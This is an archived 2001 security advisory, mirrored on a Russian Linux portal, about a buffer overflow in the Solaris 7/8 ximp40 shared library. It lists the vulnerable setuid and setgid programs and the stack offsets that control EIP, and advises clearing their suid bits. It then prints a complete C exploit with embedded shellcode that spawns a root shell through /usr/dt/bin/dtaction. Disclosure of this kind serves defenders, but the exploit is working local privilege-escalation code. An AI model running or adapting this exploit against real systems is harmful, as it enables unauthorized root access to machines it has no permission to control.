The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


[SPSadvisory#40]Solaris7/8 ximp40 shared library buffer overflow


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Date: Wed, 31 Jan 2001 22:24:32 +0900
From: UNYUN <[email protected]>
To: [email protected]
Subject: [SPSadvisory#40]Solaris7/8 ximp40 shared library buffer overflow

SPS Advisory #40

Solaris7/8 ximp40 shared library buffer overflow

UNYUN <[email protected]>
Shadow Penguin Security (http://shadowpenguin.backsection.net)

--------------------------------------------------------------

[Date]
Jan. 30, 2001

[Vulnerable]
Solaris 8 Intel & Sparc edition
Solaris 7 Intel & Sparc edition

[Not vulnerable]
unknown

[Overview]
   Shared library "ximp40" which is installed on Solaris7 and 8 by
default has buffer overflow bug, the local user can obtain root
privilege or mail gid by using the following suid/sgid programs which
are using the shared library ximp40.

*Solaris 8
suid root : /usr/dt/bin/dtaction
suid root : /usr/dt/bin/dtprintinfo
suid root : /usr/openwin/bin/sys-suspend
sgid mail : /usr/dt/bin/dtmail
sgid mail : /usr/openwin/bin/mailtool

*Solaris 7
suid root : /usr/dt/bin/dtaction
suid root : /usr/dt/bin/dtprintinfo
suid root : /usr/dt/bin/dtappgather
suid root : /usr/bin/admintool
suid root : /usr/openwin/bin/sys-suspend
sgid mail : /usr/dt/bin/dtmail
sgid mail : /usr/openwin/bin/mailtool

   The exploitable buffer overflow occurs when the long string is
specified to "arg0" of previous listed programs. This buffer overflow
overwrites the stack area which includes RET address, EIP can be
changed to the value which is specified inside arg0.

[Details]
  We explain this problem by /usr/dt/bin/dtaction which is installed
on Solaris8.
  This overflow becomes exploitable if the appropriate value is set in
 buffer offset 264 to 267, EIP can be changed to specified value which
 is located in buffer offset 260 to 263

[Avoidance]
  Clear the suid/sgid bit of all programs which are listed in [Overview].

[Caution]
   We will change this information without any notice. Use of this
information constitutes acceptance for use in an AS IS condition.
There are NO warranties with regard to this information. In no event
shall the author be liable for any damages whatever arising out of or
in connection with the use or spread of this information. Any use of
this information is only for personal experiment.

[Comments ?]
If you have something comments, please send to following address..

UNYUN <[email protected]>
http://shadowpenguin.backsection.net


[Sample code]
   This exploit obtain root privilege by using /usr/dt/bin/dtaction.
This is tested on Solaris8 Intel edition only.

/*====================================================================
   Solaris ximp40 shared library exploit for Solaris8 Intel Edition
   The Shadow Penguin Security (http://shadowpenguin.backsection.net)
   Written by UNYUN ([email protected])
   [usage]
    #xhost +targethost
    #telnet targethost
    ...
    %setenv DISPLAY yourhost:0.0
    %gcc ximp40.c
    %./a.out
    0:Default value 1:Calculated value > 1   <- Input 0 or 1

*/ #include <stdio.h> #define BUF_SIZE 272 #define EIP_OFFSET 260 #define FAKE_OFFSET 264 #define FAKE_VALUE 0x08046dec #define EIP_VALUE 0x08047cb4 #define FAKE_VALUE_DIF 0xd9c #define EIP_VALUE_DIF 0x12c #define NOP 0x90 char shell_code[]= "\xeb\x3b\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xc1" "\x88\x46\xc6\x88\x46\x07\x89\x46\x0c\x31\xc0\x50\xb0\x17\xe8\xdf" "\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53\x8d\x1e\x89" "\x5e\x08\x53\xb0\x3b\xe8\xc8\xff\xff\xff\x83\xc4\x0c\xe8\xc8\xff" "\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\xff\xff\xff\xff\xff\xff\xff" "\xff\xff"; unsigned long get_sp(void) { __asm__(" movl %esp,%eax "); } void valset(char *p,unsigned int val) { *p=val&0xff; *(p+1)=(val>>8)&0xff; *(p+2)=(val>>16)&0xff; *(p+3)=(val>>24)&0xff; } main() { char buf[BUF_SIZE]; unsigned int esp=get_sp(),sw; memset(buf,NOP,BUF_SIZE); memcpy(buf+EIP_OFFSET-strlen(shell_code),shell_code, strlen(shell_code)); printf("esp=%x\n",esp); printf("0:Default value 1:Calculated value >"); fflush(stdout); scanf("%d",&sw); if (sw==0){ valset(buf+FAKE_OFFSET, FAKE_VALUE); valset(buf+EIP_OFFSET , EIP_VALUE); printf("Jumping address = %x\n",EIP_VALUE); }else{ valset(buf+FAKE_OFFSET, esp-FAKE_VALUE_DIF); valset(buf+EIP_OFFSET , esp+EIP_VALUE_DIF); printf("Jumping address = %x\n",esp+EIP_VALUE_DIF); } buf[BUF_SIZE-1]=0; execl("/usr/dt/bin/dtaction",buf,NULL); } ----- UNYUN % The Shadow Penguin Security [ http://shadowpenguin.backsection.net ] [email protected] (SPS-Official) [email protected] (Personal) % eEye Digital Security Team [ http://www.eEye.com ] [email protected]

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру